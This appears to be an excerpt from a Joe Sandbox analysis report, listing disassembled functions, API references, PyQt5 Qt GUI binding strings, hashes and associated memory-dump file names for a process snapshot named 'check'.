Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: FromLongLong_Unsigned
String ID: QRgba64$toRgb16$toRgb16(self) -> int
API String ID: 3417993445-1451419767
Opcode ID: 77418abdcc5570d89db8823109587570d96d9a1ebed0690fd34651db4ae1a9c0
Instruction ID: a79f88b25eb47b00c0e377a39c9c5e47fc2167d38d9dbb2e4bf32fe6aad6f13b
Opcode Fuzzy Hash: 77418abdcc5570d89db8823109587570d96d9a1ebed0690fd34651db4ae1a9c0
Instruction Fuzzy Hash: 6B118E76B08F4A81EB009F65E8996BD37A4FB447A4F944136CA4D47360DF7CD945C380

Function 00007FFD862A4A70 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 39COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

?takeColumn@QStandardItem@@QEAA?AV?$QList@PEAVQStandardItem@@@@H@Z.QT5GUI ref: 00007FFD862A4AD5

Strings

takeColumn, xrefs: 00007FFD862A4B11
QStandardItem, xrefs: 00007FFD862A4B18
takeColumn(self, column: int) -> List[QStandardItem], xrefs: 00007FFD862A4B05

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Standard$?takeColumn@Item@@Item@@@@List@malloc
String ID: QStandardItem$takeColumn$takeColumn(self, column: int) -> List[QStandardItem]
API String ID: 2984354426-104668925
Opcode ID: 73369bf60872424f593a70c4a8557effc1d642facc11109d40098c0dec1b90d2
Instruction ID: c630f85c1575adc5df1f056caced63f30fd4633bc6640fed72e7c8ba2db04f34
Opcode Fuzzy Hash: 73369bf60872424f593a70c4a8557effc1d642facc11109d40098c0dec1b90d2
Instruction Fuzzy Hash: A9116A35B18A46C1EB00EF15E8A86AD37A5FB48BA0F514032CA4C03320DF3CDD49C740

Function 00007FFD86222ED0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 39COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

?blockList@QTextBlockGroup@@IEBA?AV?$QList@VQTextBlock@@@@XZ.QT5GUI ref: 00007FFD86222F30

Strings

QTextList, xrefs: 00007FFD86222F74
blockList, xrefs: 00007FFD86222F6D
blockList(self) -> List[QTextBlock], xrefs: 00007FFD86222F61

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: List@Text$?blockBlockBlock@@@@Group@@malloc
String ID: QTextList$blockList$blockList(self) -> List[QTextBlock]
API String ID: 532813319-412095556
Opcode ID: 555c6aa7270a20ac10a90a984b19202cd818b9df9e9263ed159d0aadd8a9efe2
Instruction ID: 4e5b4f56950dadacf7a1b8687eb9ae4a1f0f4b89a73ac4b1e6c980bc365455bd
Opcode Fuzzy Hash: 555c6aa7270a20ac10a90a984b19202cd818b9df9e9263ed159d0aadd8a9efe2
Instruction Fuzzy Hash: CD114835B18B4681EB009F55E8A87AD77A4FB48BA4F954076DA5D07320DF7CD949C340

Function 00007FFD86244F60 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 39COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

?characterAt@QTextDocument@@QEBA?AVQChar@@H@Z.QT5GUI ref: 00007FFD86244FC5

Strings

characterAt, xrefs: 00007FFD86244FFD
QTextDocument, xrefs: 00007FFD86245004
characterAt(self, pos: int) -> str, xrefs: 00007FFD86244FF1

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?characterChar@@Document@@Textmalloc
String ID: QTextDocument$characterAt$characterAt(self, pos: int) -> str
API String ID: 2619018310-237751287
Opcode ID: db6469f2a294644de60f0975af4e60ab4476c4bc0c1b4f7a428d4871f680994e
Instruction ID: a4b48db02733efbd7ebe7ff1243987fefe0d9cc116abba6f0ceafdf7186a0e87
Opcode Fuzzy Hash: db6469f2a294644de60f0975af4e60ab4476c4bc0c1b4f7a428d4871f680994e
Instruction Fuzzy Hash: 4E111C75B18A56C6EB00EF25E869BAD33A5FB48B94F954036CA4D43320DF3DD949C700

Function 00007FFD86242FD0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 39COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

?lineAt@QTextLayout@@QEBA?AVQTextLine@@H@Z.QT5GUI ref: 00007FFD86243035

Strings

lineAt, xrefs: 00007FFD8624306D
QTextLayout, xrefs: 00007FFD86243074
lineAt(self, i: int) -> QTextLine, xrefs: 00007FFD86243061

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Text$?lineLayout@@Line@@malloc
String ID: QTextLayout$lineAt$lineAt(self, i: int) -> QTextLine
API String ID: 3784551423-616224910
Opcode ID: 8a0f94f6ede617f4e25b19df67c0ee23ef932572901c92733ff49f0b8efff819
Instruction ID: cea2754546d0e8246b2fe1811488652d90b042fae95327e38991a1252f816218
Opcode Fuzzy Hash: 8a0f94f6ede617f4e25b19df67c0ee23ef932572901c92733ff49f0b8efff819
Instruction Fuzzy Hash: 27111C76B18A56C2EB00EF15E8A9AAD33A5FB48BA4F954072CA5D47320DF3DDD49C700

Function 00007FFD86228CD0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 39COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

?paintRectPixels@QPageLayout@@QEBA?AVQRect@@H@Z.QT5GUI ref: 00007FFD86228D35

Strings

paintRectPixels, xrefs: 00007FFD86228D6D
paintRectPixels(self, resolution: int) -> QRect, xrefs: 00007FFD86228D61
QPageLayout, xrefs: 00007FFD86228D74

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?paintLayout@@PagePixels@RectRect@@malloc
String ID: QPageLayout$paintRectPixels$paintRectPixels(self, resolution: int) -> QRect
API String ID: 4186873064-1342530731
Opcode ID: 4c66bcfd935411fcb285dd1fb6498f28b684648d906c444376533944f5b3c9ab
Instruction ID: d6f69a7d8eb1fb9bcf0331566cc99863a107b36c21440bac351e12b03d799a0b
Opcode Fuzzy Hash: 4c66bcfd935411fcb285dd1fb6498f28b684648d906c444376533944f5b3c9ab
Instruction Fuzzy Hash: B6114875B18A46C2EB00EF25E8A96AD33A5FB48BA0F914072CA4D03320DF3DD949C700

Function 00007FFD86244DF0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 39COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

?takeRow@QStandardItemModel@@QEAA?AV?$QList@PEAVQStandardItem@@@@H@Z.QT5GUI ref: 00007FFD86244E55

Strings

takeRow, xrefs: 00007FFD86244E91
takeRow(self, row: int) -> List[QStandardItem], xrefs: 00007FFD86244E85
QStandardItemModel, xrefs: 00007FFD86244E98

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Standard$?takeItemItem@@@@List@Model@@Row@malloc
String ID: QStandardItemModel$takeRow$takeRow(self, row: int) -> List[QStandardItem]
API String ID: 1910459249-3996486387
Opcode ID: b299b3d7a64e27fcfc8a49831a26067fbcef67439b43778987ac35ed93e7c789
Instruction ID: 35b54a20ada231544202163a45f3894ea081302ae1bdbf66378adb772c95dca3
Opcode Fuzzy Hash: b299b3d7a64e27fcfc8a49831a26067fbcef67439b43778987ac35ed93e7c789
Instruction Fuzzy Hash: 9F112575B18A46C2EB00EF55E8A9AAD37A5FB48BA0F954072CA4D03320EF3DD949C700

Function 00007FFD862A6DF0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 39COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFD86349D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFD862212CB), ref: 00007FFD86349D32

?conjugated@QQuaternion@@QEBA?AV1@XZ.QT5GUI ref: 00007FFD862A6E50

Strings

QQuaternion, xrefs: 00007FFD862A6E94
conjugate(self) -> QQuaternion, xrefs: 00007FFD862A6E81
conjugate, xrefs: 00007FFD862A6E8D

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: ?conjugated@Quaternion@@malloc
String ID: QQuaternion$conjugate$conjugate(self) -> QQuaternion
API String ID: 719700225-3984333327
Opcode ID: 6796246b1136252173e0ccfccad625d648476fcf9b949e87637231904e930445
Instruction ID: c9e692e55a3efde8a85097c52117a6443d5f93a97e906cd1726acf97d1feefc0
Opcode Fuzzy Hash: 6796246b1136252173e0ccfccad625d648476fcf9b949e87637231904e930445
Instruction Fuzzy Hash: 06111875B08B8681EB009F55E8A8BAD37A4FB49BA0F954072DA4D07320DF7CD959C740

Function 00007FFD86294E20 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 39COMMON

Download Yara Rule

APIs

PyBool_FromLong.PYTHON3 ref: 00007FFD86294E7F

Strings

atEnd, xrefs: 00007FFD86294E9E
iterator, xrefs: 00007FFD86294EA5
atEnd(self) -> bool, xrefs: 00007FFD86294E92

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Bool_FromLong
String ID: atEnd$atEnd(self) -> bool$iterator
API String ID: 2610644205-2271050987
Opcode ID: d8fd0a3006c169967456930754c3742f78c83f69e994cf498ae724f8e66b240e
Instruction ID: b5aff3106721ddfc049c5ab4c5ad8b297484fc92188c37faf6e76e34e67f0442
Opcode Fuzzy Hash: d8fd0a3006c169967456930754c3742f78c83f69e994cf498ae724f8e66b240e
Instruction Fuzzy Hash: AE115B76B18B4682EB00DF54E4989B833A8FB447A4FA90472CA5D47320DF79DD9AC380

Function 00007FFD86260AA0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 38COMMON

Download Yara Rule

APIs

PyBool_FromLong.PYTHON3 ref: 00007FFD86260B02

Strings

QRgba64, xrefs: 00007FFD86260B28
isOpaque(self) -> bool, xrefs: 00007FFD86260B15
isOpaque, xrefs: 00007FFD86260B21

Memory Dump Source

Source File: 0000000F.00000002.2682007534.00007FFD86221000.00000020.00000001.01000000.00000045.sdmp, Offset: 00007FFD86220000, based on PE: true

Associated: 0000000F.00000002.2681917175.00007FFD86220000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682741037.00007FFD8634B000.00000002.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682924004.00007FFD86408000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2682998327.00007FFD8640A000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683298133.00007FFD8640E000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2683825382.00007FFD86416000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684149446.00007FFD86422000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684466254.00007FFD86428000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2684858377.00007FFD8642A000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685324972.00007FFD86435000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685435519.00007FFD86441000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685487367.00007FFD86447000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2685594032.00007FFD86448000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686583528.00007FFD8645C000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686685582.00007FFD8645D000.00000008.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686793662.00007FFD8645E000.00000004.00000001.01000000.00000045.sdmpDownload File
Associated: 0000000F.00000002.2686877771.00007FFD86460000.00000002.00000001.01000000.00000045.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_7ffd86220000_check.jbxd

Similarity

API ID: Bool_FromLong
String ID: QRgba64$isOpaque$isOpaque(self) -> bool
API String ID: 2610644205-3064127721
Opcode ID: e1877c167d9fa4200438a98b5e00b9ed04bdecfd0e3f48e7403e2b962b08bb61
Instruction ID: 9156d3ee02d9e089d064ddee6ce021efbc70c949942838b5471c27fd5671e648
Opcode Fuzzy Hash: e1877c167d9fa4200438a98b5e00b9ed04bdecfd0e3f48e7403e2b962b08bb61
